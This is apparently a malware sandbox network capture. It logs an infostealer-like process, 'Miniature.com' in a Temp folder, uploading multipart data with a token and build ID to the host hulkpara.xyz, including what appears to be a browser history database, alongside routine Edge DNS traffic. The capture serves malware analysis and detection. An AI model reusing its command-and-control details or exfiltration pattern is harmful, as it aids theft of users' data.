                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-19 07:13:47 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:13:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-19 07:13:47 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49741 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:46 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----USR1N7QIEU37YUAS2V3W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:13:46 UTC | 493 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74
Data Ascii: ------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------USR1N7QIEU37YUAS2V3WCont
2024-12-19 07:13:48 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:13:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-19 07:13:48 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49760 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:53 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----8G4OP8G4WTRIMY5XTR1D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 3161
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:13:53 UTC | 3161 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 38 47 34 4f 50 38 47 34 57 54 52 49 4d 59 35 58 54 52 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 38 47 34 4f 50 38 47 34 57 54 52 49 4d 59 35 58 54 52 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 38 47 34 4f 50 38 47 34 57 54 52 49 4d 59 35 58 54 52 31 44 0d 0a 43 6f 6e 74
Data Ascii: ------8G4OP8G4WTRIMY5XTR1DContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------8G4OP8G4WTRIMY5XTR1DContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------8G4OP8G4WTRIMY5XTR1DCont
2024-12-19 07:13:54 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:13:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-19 07:13:54 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          16192.168.2.749772162.159.61.34431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
2024-12-19 07:13:55 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:54 GMT
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                          CF-RAY: 8f4597be1f580f7d-EWR
                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1b 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom()


Session ID: 17 | Source IP: 192.168.2.7 | Source Port: 49781 | Destination IP: 162.159.61.3 | Destination Port: 443 | PID: 1504 | Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:54 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
2024-12-19 07:13:55 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:54 GMT
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                          CF-RAY: 8f4597be2c0942db-EWR
                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom()


Session ID: 18 | Source IP: 192.168.2.7 | Source Port: 49782 | Destination IP: 172.64.41.3 | Destination Port: 443 | PID: 1504 | Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:54 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
2024-12-19 07:13:55 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:54 GMT
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                          CF-RAY: 8f4597be2b124201-EWR
                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2c 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom,Pc)


Session ID: 19 | Source IP: 192.168.2.7 | Source Port: 49770 | Destination IP: 94.130.191.168 | Destination Port: 443 | PID: 7416 | Process: C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:54 UTC | 327 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----9RIW4ECJ5XBAAI58QIEC
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 207993
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 39 52 49 57 34 45 43 4a 35 58 42 41 41 49 35 38 51 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 39 52 49 57 34 45 43 4a 35 58 42 41 41 49 35 38 51 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 39 52 49 57 34 45 43 4a 35 58 42 41 41 49 35 38 51 49 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------9RIW4ECJ5XBAAI58QIECContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------9RIW4ECJ5XBAAI58QIECContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------9RIW4ECJ5XBAAI58QIECCont
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                          Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-19 07:13:56 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:13:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 49785 | 172.64.41.3 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:55 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 49787 | 162.159.61.3 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:55 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 49774 | 172.217.17.65 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:55 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-19 07:13:55 UTC | 563 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 154477
X-GUploader-UploadID: AFiumC7CZ0UZ67drcZI4imfdyK3crLxFmtx6SBomJC1Qfn8mJZzHNJmIxyaV4JMGqJIHwbMn
X-Goog-Hash: crc32c=F5qq4g==
Server: UploadServer
Date: Wed, 18 Dec 2024 15:58:14 GMT
Expires: Thu, 18 Dec 2025 15:58:14 GMT
Cache-Control: public, max-age=31536000
Age: 54941
Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
